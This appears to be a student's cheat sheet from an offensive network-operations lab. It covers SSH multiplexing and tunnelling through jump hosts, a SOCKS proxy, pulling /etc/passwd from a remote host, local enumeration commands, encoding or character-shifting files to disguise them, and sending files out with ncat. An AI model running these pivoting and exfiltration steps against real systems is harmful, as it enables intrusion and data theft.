ssh -M -S /tmp/s root@<IP ADDRESS> <TUNNEL COMMANDS -R or -L>
ssh -S /tmp/s x@x
scp -o 'ControlPath=/tmp/s' x@x:<Path>

Configuration File Method (~/.ssh/ssh_config)
HostName *
ControlPath ~/.ssh/controlmasters/%r@%h:%p
ControlMaster auto
ControlPersist 10m


ssh -MS /tmp/jump student@10.50.24.175 -this connection has to be open to do lower commands
ssh -S /tmp/jump blah -O forward -L 1111:192.168.28.111:80
ssh -S /tmp/jump blah -O forward -L 2222:192.168.28.111:8080
ssh -S /tmp/jump blah -O cancel -L 2222:192.168.28.111:8080
ssh -S /tmp/jump blah -O forward -L 3333:192.168.28.245:2222 ~~~~~ not actual location
ssh -MS /tmp/t1 -p 3333 comrade@127.0.0.1
ssh -S /tmp/t1 blah -O forward -D 9050 
scp -o ControlPath="/tmp/t1" blah:/etc/passwd .
==============================================================

local host enumeration
win - net user, tasklist /v, tasklist /svc, ipconfig /all, 
lin - cat /etc/passwd,  ps -elf, chkconfig#SysVm, systemctl --type=service# SystemD, ip a/ifconfig -a,

Session Transcript
ssh <user>@<host> | tee

Obfuscation (Windows)
type <file> | %{$_ -replace 'a','b' -replace 'b','c' -replace 'c','d'} > translated.out
certutil -encode <file> encoded.b64

Obfuscation (Linux)
cat <file> | tr 'a-zA-Z0-9' 'b-zA-Z0-9a' > shifted.txt
cat <file>> | base64

Encrypted Transport
scp <source> <destination>
ncat --ssl <ip> <port> < <file>
=====================================================================================

